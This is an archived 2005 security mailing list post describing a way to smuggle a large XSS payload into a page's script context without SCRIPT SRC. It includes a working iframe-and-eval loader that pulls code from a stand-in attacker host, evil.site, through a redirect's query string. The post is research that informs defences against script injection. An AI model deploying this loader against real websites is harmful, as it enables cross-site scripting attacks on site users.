|
WebApp Sec
mailing list archives
Importing large code piece into Javascript context without SCRIPT SRC=...
From: "Amit Klein (AKsecurity)" <aksecurity () hotpop com>
Date: Fri, 14 Oct 2005 20:10:41 +0200
Hi
Recently, I've been toying with the somewhat academic question of whether it is possible to
"import" a large piece of JS code (to be used as XSS payload), given that a script context
is already available, BUT without using SCRIPT SRC=...
This question is triggered by the "script" keyword of Gervase Markham's Content-
Restrictions suggestion (http://www.gerv.net/security/content-restrictions/).
I came up with a nice idea, which is abusing any manner of loading HTML content (such as
IFRAME, new windows, etc.) as following:
The attacker forces a load from its own website (evil.site), which redirects the browser
back to the original website (say target.site). It needs to do so with a query (e.g.
"?data=..."). This query is the channel through which the JS payload is transmitted to the
malicious bridge-head. In the below example, assume that evil.site/redir.cgi simply
redirects to target.site/index.html?data=...
Note that it may take few seconds for the target.site page to load, and meanwhile, the
script (which runs in the target.site domain) cannot access the IFRAME (which initially is
in evil.site domain). Hence the need for the loop.
<iframe src="http://evil.site/redir.cgi"; width=1 height=1></iframe>
<script>
var tid;
function fetch()
{
try
{
var data=document.frames[0].location.search.substr(6);
clearInterval(tid);
eval(data);
}
catch(ex)
{
}
}
tid = setInterval('fetch()', 100);
</script>
As you can see, with about 240 bytes, I can force a load of any script code through the
query part, which can host 4KB. And it's easy to do this multiple times.
-Amit
 By Date 
By Thread
Current thread:
- Importing large code piece into Javascript context without SCRIPT SRC=... Amit Klein (AKsecurity) (Oct 14)
|
Intro
